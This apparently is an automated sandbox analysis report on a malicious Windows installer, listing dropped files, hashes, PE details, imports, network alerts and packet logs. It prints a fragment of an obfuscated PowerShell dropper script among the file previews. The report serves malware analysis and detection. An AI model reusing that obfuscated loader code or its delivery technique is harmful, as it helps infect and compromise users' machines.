SSDEEP:	12288:7Xcxx2t6G/sAgiXH5DybRcnygUUDJ3l0DbiLutNS3haM78EQMZxmfemFXHW65zu+:7X22t6whH1nXrLKvE3l8Et2F2YuriV
MD5:	C9007399358B2C71F94731C0DADA3AAE
SHA1:	52961D38410067BE7256356AA18EE52051BEF614
SHA-256:	A3F7477A9612F8AC90866FB2C4ADC56A447F4A8262E4AC75BB1C825A254AFBAC
SHA-512:	67B9D38CCC08B2ACDC09DF19EBED66A945F6A6854E1E5F9B3F1A73EEF4A466ABBB13FA52519C732445D6418C388ADEC2B9EE827100FF2CAEDD0958F95061BB77
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..............................................z..........X................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc....z.......\|..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\Teet173.net

Download File

Process:	C:\Users\user\Desktop\87h216Snb7.exe
File Type:	data
Category:	dropped
Size (bytes):	454486
Entropy (8bit):	1.2524987371551821
Encrypted:	false
SSDEEP:	1536:v0ynJn+FyRFgfJzXCCuWE44ok+4FoPtBNuNi:v0ynJtFgfJW544oeWH
MD5:	F4323CDDCA33656C45D3017DBB494458
SHA1:	6B9284C25151843B71F790399CBAE4BD17109871
SHA-256:	B5F229D8FCD6FE20FCED25B4714776C43CD2A7BEBDB1DEA828626A9053B0D83D
SHA-512:	A3CC6B0945806B795724A708128F632682FF608081099CC7BFD9E6DF2C0C9BBE7D47C15178C9065BF5E24020DF0E74EE5BF3ED52BA7CE570E7D7AC30590271A3
Malicious:	false
Preview:	........................!.A......v................................ ................e...........X............................Y............>..........5..O"..........................................N.....4..............t.....................................................................2..................b.........%...........q.....................[......7...............>....................................................................................O...................................<................................Z....................................#.....................................................I.........`....................................V................................,.......................................;........................................................Q........................................P.............................d=...............\..................................................8.............................,..........B........................

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\bibliotekskaldene.meg

Download File

Process:	C:\Users\user\Desktop\87h216Snb7.exe
File Type:	data
Category:	dropped
Size (bytes):	409946
Entropy (8bit):	1.2535737381103589
Encrypted:	false
SSDEEP:	1536:3pKI3cbwZj87HWgWRQy56IrWKlUHAGqheijKK:738u5rCAThz
MD5:	4FF250D172D6AA46629B269AC732435B
SHA1:	221C813C3C21A049AAC6E1625D128153743BD0BB
SHA-256:	F6E5E9B0245658FF93C7335D7FDD1AA4ED097FFD0D48ABCB23D07A11D49E3040
SHA-512:	5456EA2C0FF252FC830670C5293B24D555C0728F3ECD25E3485E656176FFD039C14ACCE93402816FB96A36B19A836D2A84E9429A2D04745BDE9D011CB91189B7
Malicious:	false
Preview:	.8....L...........a..E...........................T................................................W.....j...............................i...............................qB....................B........................................D.................=................................................j...................:..................................../...G..............................................................................8..................................................M........m..................................>...............>...........................................................-......................................u..............._.......7...........................=.........]....................................................................................................................................k................;..............................................p...................................~\....................m..........................P...

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\nedlaeggelse.eva

Download File

Process:	C:\Users\user\Desktop\87h216Snb7.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
Category:	dropped
Size (bytes):	377855
Entropy (8bit):	1.2480133053641047
Encrypted:	false
SSDEEP:	768:T3j4B9Djpmub8VeOfAGor4RPrbZq9IFK9OTwdiY6d7Cl9v/sqiXIaIgIo4Vcrn/S:29P9dWwwPEofIxXG5DHJ/v/X
MD5:	04F33F90D56994EC3DCDFC7981DC9AA0
SHA1:	E1B39BD71B685C3EC9A0DD1F63521D019BD6A126
SHA-256:	066EFC37F0302018EE5F4FE71649E62F64DD2310D2A8D00306A357DD0BD43C36
SHA-512:	80263A59D97ED83826172858DD1230DAF55BDCFA3B583B29B0A2FD2349BCB8E8EC14E820A4F16D1D0BAEBE8AB243514A22CCD29C4397BF28BA5EC36D40456DBE
Malicious:	false
Preview:	.............................z...................M............n..............m..................................S.....9.W.................................^........^....................~.................o..................... ......................... .............................................................................................................................................N.................i.................w....................t.............................................^........Z................=.....................................iD..............................................................6...................................................................q......................Q........k...........,........r............>...............'..+....................................................o..........J......s.................................................................................................x......N.............................................

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\tretrinsraket.rik

Download File

Process:	C:\Users\user\Desktop\87h216Snb7.exe
File Type:	data
Category:	dropped
Size (bytes):	494972
Entropy (8bit):	1.2524594051710012
Encrypted:	false
SSDEEP:	1536:9ceAUHe6nPz1UkcBT5P7p3mq/1Ie5GkgjKjz:Rve6n4z7pRueo5K
MD5:	539CFE2727A7650AF877C317CD317A90
SHA1:	64F6F5F6EE89755BA75942B746529BC879817613
SHA-256:	AE12461B71485C805DB15AAA75B5F70C957EBF40678D65CB6D3EF497F67AAFE3
SHA-512:	5A54A7EBEEA0DDD0E0CE16ED2DB2C16C39777C663075A0C5CCF5C1D313E9F760B61DA06B330AD5CA228CA92716192B52D07D03F96ED695CD28DDFE36EB65FE85
Malicious:	false
Preview:	..............................].....................................................................................................................t~...............................'............j................<....u.................Q.......................................................................u...............(.......................................................................................................................k.................................m...8...........................................................s.................................S....6.........y.........X.....Y.......................!.......... ................................................................................................?................9.........................."......Y....................t.....................................................................J....B.............................................................s.....................................................

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\udplacder.keg

Download File

Process:	C:\Users\user\Desktop\87h216Snb7.exe
File Type:	data
Category:	dropped
Size (bytes):	499232
Entropy (8bit):	1.256116885413473
Encrypted:	false
SSDEEP:	1536:F8NKKWFbUGe3N39maaBQhaN15GaLL63n4BlYQi/SZmoN79frhS6qGSi:F8N7oUnNmN7hy3n4BlYLKLlMG5
MD5:	C458F59BAFFABE11D1AD37909B3C7079
SHA1:	C94C42A1AB8ABB09507280B380CAD2A920C2AE93
SHA-256:	7073DC7C9F5942B9D5FA2D6E24CEA3D4CE6BA93176DD090EF5A5A6796BCD8DA5
SHA-512:	34CB8B88371DE84C270CEB88B6A22F325278A9AC211E813562263E8C299DA6F76E2B205D0FDF6E7B0ED033EE10B0717F89AADA4EEC3E3D80C1B9AEC89D340F71
Malicious:	false
Preview:	............................................................{........%......[........................................0..............................................{...B.....................;......................i.................................................#.............................s.................................................4.....8.........S.............................................................................p......................................j.....H....................n......................\.........................................................j................................>................................0...........?............................................-.....7=........................................i..............;..............................................................m..........................t...................................."............................................................................................._........

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Fugtighedsanlggene.Spo

Download File

Process:	C:\Users\user\Desktop\87h216Snb7.exe
File Type:	data
Category:	dropped
Size (bytes):	323948
Entropy (8bit):	7.714465736828895
Encrypted:	false
SSDEEP:	6144:zCPKjt6rqobGFAJ0gj9UyoDkCcq3+VbPGZo8qIdtxpj:2Kj0LRycSyoQ6+N2qO
MD5:	BEACF496F095426C48CDCBFB02AFF79C
SHA1:	D26ADAA0E0E3026D14CAB7E0D4B3529452B42493
SHA-256:	A7A907803E2932E0CA0A961E6924436E07B95AEDA2D4641A612F99AA215ED3A8
SHA-512:	E7EC3B661A623831F6A7CD31C194CE25F0ED3BFC0BC2657A5F8A84C3C11EA0F31AF64062EF28F92A3D390A2C5193AC26B38985843749CFF2791EC811897D8D66
Malicious:	false
Preview:	.............vv........i............000...E.......nnn.........0............................n.........!................J........ffff.............9....Q......................................''''...........LLL.y.....p.u...........................U..............................yyyy.PP.......HHH.........-....................................DDD.FFF.....s...ii.K.e.......n.......\.......e.Z.............m.jj.................~~~..............%........P....s.........,,...b......x...............E.........RR.4..............\|\|\|\|\|...........................k......5555.}}.m..T.......o................o.X.....zz.........&&..........................JJJJ.....[...++.......B..............QQ...........................MM.............................}}}}.)..................0000...............,...........c.W..................#.qq...........HH.H...#.......................................;.....DD......!!.........T..P..............mm..::........................ss....#.W..sss.\\....ff................\..........EE..

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Neonlysskilt.txt

Download File

Process:	C:\Users\user\Desktop\87h216Snb7.exe
File Type:	ASCII text, with very long lines (338), with no line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	4.307059828439222
Encrypted:	false
SSDEEP:	6:wXW0N+ueXy8QT/DLlbCqbtidDt4jHID5GXsW/uyiNXSgP/CAjTOB+M9E+n:wXW0GXK/XlTbtq5Nt6/u3HCA2B+M9E+n
MD5:	465F76EC7C2B514001DF749A302E6BFB
SHA1:	F00C03E1DAC98A5F44C3920E49D73535945F5188
SHA-256:	63B00F84026BA825D47D2185D7CD819AD9059DAC82BDBC30AD133ECB05327E7F
SHA-512:	E72609AA7C0B54E17A0ABC784CF599ACBA2149B232880F9F25D08E2326F295DFB7607EC9CB1922B547F9495FE4ED25D4A4B1F2724D8EDA1A234F7EB2CC5235FC
Malicious:	false
Preview:	jgt pensionrerne overhands hedley helmuths offensives.vgtklasses countercharged hideaways.kassandras courtiership organics ejectum gaffeltrucket,toothachy fellowlike hesiometre stripfilm kuldslaaendes,overenskomstresultaternes stitrernes konfessionen mandhaftig.communiqu fuldtidsbeskftigelsen bnkebiderne stberiers hors beached pallette,

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une

Download File

Process:	C:\Users\user\Desktop\87h216Snb7.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4023), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	73382
Entropy (8bit):	5.152692933621261
Encrypted:	false
SSDEEP:	1536:DjIAqrP2YK6kbR+bWwAlb1MQvGA+tR84zL/vWAF3c9n:DDqrP2YLkMbWw6MQu5DFXvpF3In
MD5:	D779CF7D1C17D1C3A3F3A01045E21C66
SHA1:	62BEC72BB9CA8B42AF58DCF6D1F697C28E970632
SHA-256:	D3EA7137AB96F1B33A042D5A46DA033D5448FA21D494A439BFF1B99D36613F5D
SHA-512:	386658888F01D8787B4F0953156EC2086AC1D7802991BC20D6F388CA133D02E2EB59522F8201D7D7CB11FC2B93D902A78A212F68465E08709AA415E22B9B3004
Malicious:	false
Preview:	$Perimedullarylokbogstavetnkylotia=$Kankie;.....<#Anstdelig grsganes Ondograph Overbend Predeceiving Unconvert #>..<#Cytomegalic Beadings Archmystagogue Trakkasseriets Klosetskaalenes Regangene Eireannach #>..<#Vaporium Tantiemens Flot Views Mntvaskeriers Diaphanometric Afguderiskes #>..<#Tilvejebringelsers Ordlyde Forhaan Fabriksinspektrernes Gryntelydenes Arbejdskammeraters #>..<#Disperser Delineation Criminalness Adgangskoder #>..<#amery Asylum Skgvkster #>...$Swayer = @'.Anti,ad.Diploco$SvirvleGGaranteoAnt.coxdHertugisBezilsmkLoggersrRist,ffi NonsenvUdk,ngensn,keroiSpinthenseminargRun rst=Fedning$TflenkrSPengelnhParaguao nsceptoAabningl A.ingle OutedgrMeteoro;Imprint.Non erefHestestuTumultanBalsamicFyrreaat Sag egiOdds.quoArchplunAl.arot CacatuaOWe.therv MoistueBedriftrShigellmHystadea SlutbelamplifyeKonsu.cdlunelseeFuldfre1Flonel 6 Exacer0Tr estr Slidern(T.ndfyl$SteppebP B.talieOmslagsr ndestiFerskenmAftrknieSukkerkdMetagrauPej.inglD inkerlSelvstnaPseudoirMercuriyNepotisl emune

C:\Windows\huzzah.lnk

Download File

Process:	C:\Users\user\Desktop\87h216Snb7.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	822
Entropy (8bit):	3.353931458984559
Encrypted:	false
SSDEEP:	12:8wl0ZRm/3BVkUnDypCucpANRDucLANkXg1MJ7ScEUm1bflgRNwgL6CNbw4t2YZ/e:8NU/BTDICucmDu/oMcOict2bIqy
MD5:	149D7BDC9D71417B0B53A67436D2BC4B
SHA1:	033E04F612537A6789ED1E7FA3329BA2701C8490
SHA-256:	08C6B5A0A853622ED995F5D855629A43009BA25FF2633BA5A29AB9E7C1D53412
SHA-512:	12B9004F8A67CB00B60A9EF1A1CE18DC2CDBAD5AF562996AE249D05DE9AD3D8A93A6CAB4A0FB96671CCB64E013CAF9E30C2E2B466F5418C129E89F0DC92D8A24
Malicious:	false
Preview:	L..................F........................................................I....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....P.1...........Fonts.<............................................F.o.n.t.s.....t.2...........tegnskriftens.esk.T............................................t.e.g.n.s.k.r.i.f.t.e.n.s...e.s.k... .......\.F.o.n.t.s.\.t.e.g.n.s.k.r.i.f.t.e.n.s...e.s.k.P.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.n.t.e.r.p.e.l.l.a.n.t.\.s.t.i.m.u.l.e.r.e.\.C.h.e.m.o.s.i.s.\.A.m.i.d.o.a.l.d.e.h.y.d.e.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.649692893120675
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	87h216Snb7.exe
File size:	924'744 bytes
MD5:	c9007399358b2c71f94731c0dada3aae
SHA1:	52961d38410067be7256356aa18ee52051bef614
SHA256:	a3f7477a9612f8ac90866fb2c4adc56a447f4a8262e4ac75bb1c825a254afbac
SHA512:	67b9d38ccc08b2acdc09df19ebed66a945f6a6854e1e5f9b3f1a73eef4a466abbb13fa52519c732445d6418c388adec2b9ee827100ff2caedd0958f95061bb77
SSDEEP:	12288:7Xcxx2t6G/sAgiXH5DybRcnygUUDJ3l0DbiLutNS3haM78EQMZxmfemFXHW65zu+:7X22t6whH1nXrLKvE3l8Et2F2YuriV
TLSH:	0B1512057B03EDB6F76743309819D4068A69EE391608B3DE7B34FBBB7A32614091F616
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....

File Icon


Icon Hash:	8ad03039793b8f46

Static PE Info

General

Entrypoint:	0x40351c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Dolite, O=Dolite, L=Chattanooga, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	13/06/2024 04:25:27 13/06/2027 04:25:27
Subject Chain	CN=Dolite, O=Dolite, L=Chattanooga, C=US
Version:	3
Thumbprint MD5:	7D138582EB2418096D8C199319C35CF7
Thumbprint SHA-1:	F3560DACA9DD9A948F806B1FA13946EAC07D249E
Thumbprint SHA-256:	F2677C8728BD15CB5DB2B9945757464B31B42FF6A1CABD369F29D24FEEDB26D9
Serial:	153E2827EA78B8D05D0660B67ABB5E1BB23AA09A

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F6174BEB96Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F6174BEB938h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429AD8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x58000	0x27ae0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xe1358	0x8f0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6576	0x6600	1e4066ed6e7440cc449c401dfd9ca64f	False	0.6663219975490197	data	6.461246686118911	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1fb38	0x600	2e1d49b2855a89e6218e118f0c182b81	False	0.5026041666666666	data	4.044293204800279	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x2e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x58000	0x27ae0	0x27c00	44fcccfb09828564447b515fda1781b1	False	0.29796825864779874	data	4.41590745621256	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x58328	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2519223944161836
RT_ICON	0x68b50	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.2898885852428001
RT_ICON	0x71ff8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.34117375231053604
RT_ICON	0x77480	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.36809163911195086
RT_ICON	0x7b6a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.42064315352697096
RT_ICON	0x7dc50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.48381801125703566
RT_ICON	0x7ecf8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6187943262411347
RT_DIALOG	0x7f160	0x100	data	English	United States	0.5234375
RT_DIALOG	0x7f260	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x7f380	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x7f448	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x7f4a8	0x68	data	English	United States	0.7596153846153846
RT_VERSION	0x7f510	0x290	MS Windows COFF PA-RISC object file	English	United States	0.5121951219512195
RT_MANIFEST	0x7f7a0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T13:21:36.718510+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49752	172.217.19.174	443	TCP
2024-12-17T13:21:45.729182+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49778	193.122.130.0	80	TCP
2024-12-17T13:21:48.541697+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49778	193.122.130.0	80	TCP
2024-12-17T13:21:50.157618+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49790	104.21.67.152	443	TCP
2024-12-17T13:21:51.432452+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49794	193.122.130.0	80	TCP
2024-12-17T13:21:54.573138+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49802	193.122.130.0	80	TCP
2024-12-17T13:21:57.789006+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49813	193.122.130.0	80	TCP
2024-12-17T13:22:02.337091+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49823	104.21.67.152	443	TCP
2024-12-17T13:22:05.227115+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49834	104.21.67.152	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 13:21:33.567418098 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:33.567466974 CET	443	49752	172.217.19.174	192.168.2.7
Dec 17, 2024 13:21:33.568033934 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:34.078059912 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:34.078078985 CET	443	49752	172.217.19.174	192.168.2.7
Dec 17, 2024 13:21:35.774971962 CET	443	49752	172.217.19.174	192.168.2.7
Dec 17, 2024 13:21:35.775193930 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:35.775737047 CET	443	49752	172.217.19.174	192.168.2.7
Dec 17, 2024 13:21:35.775904894 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:35.949480057 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:35.949511051 CET	443	49752	172.217.19.174	192.168.2.7
Dec 17, 2024 13:21:35.949839115 CET	443	49752	172.217.19.174	192.168.2.7
Dec 17, 2024 13:21:35.951792955 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:36.004630089 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:36.051331043 CET	443	49752	172.217.19.174	192.168.2.7
Dec 17, 2024 13:21:36.718472004 CET	443	49752	172.217.19.174	192.168.2.7
Dec 17, 2024 13:21:36.718581915 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:36.718607903 CET	443	49752	172.217.19.174	192.168.2.7
Dec 17, 2024 13:21:36.718663931 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:36.718780994 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:36.718811035 CET	443	49752	172.217.19.174	192.168.2.7
Dec 17, 2024 13:21:36.718853951 CET	49752	443	192.168.2.7	172.217.19.174
Dec 17, 2024 13:21:36.875739098 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:36.875762939 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:36.875842094 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:36.876123905 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:36.876132965 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:38.577389956 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:38.577454090 CET	49763	443	192.168.2.7	142.250.181.97
